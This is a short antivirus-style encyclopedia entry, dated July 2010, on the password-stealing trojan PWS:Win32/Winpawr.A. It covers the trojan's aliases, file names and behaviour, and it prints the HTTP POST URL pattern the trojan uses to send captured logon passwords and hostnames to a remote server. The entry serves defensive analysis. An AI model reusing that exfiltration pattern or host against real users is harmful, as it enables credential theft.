Home / malware PWS:Win32/Winpawr.A
First posted on 13 July 2010.
Source: SecurityHomeAliases :
PWS:Win32/Winpawr.A is also known as Trojan horse Injector.CK (AVG), Application.VirTool.SMJ (BitDefender).
Explanation :
PWS:Win32/Winpawr.A is a trojan that could be used by other malware to collect user logon credentials and send the sensitive information to a remote server.
Top
PWS:Win32/Winpawr.A is a trojan that could be used by other malware to collect user logon credentials and send the sensitive information to a remote server. InstallationThis trojan may be installed by other malware and could be present as a file named "win.dll". File attributes of the trojan component could reference the name "WinLogonHijacker.dll". Payload Captures logon credentialsWhen PWS:Win32/Winpawr.A executes, it attempts to capture user logon credentials and send the information to a remote server "lixian7185.host.zgrdns.com" using HTTP POST. The information is sent as a string as in the following POST example: lixian7185.host.zgrdns.com/ver/ver.asp?usd=@%06%3F%3F&pwd=<password>&host=<hostname>
Analysis by Marianne MallenLast update 13 July 2010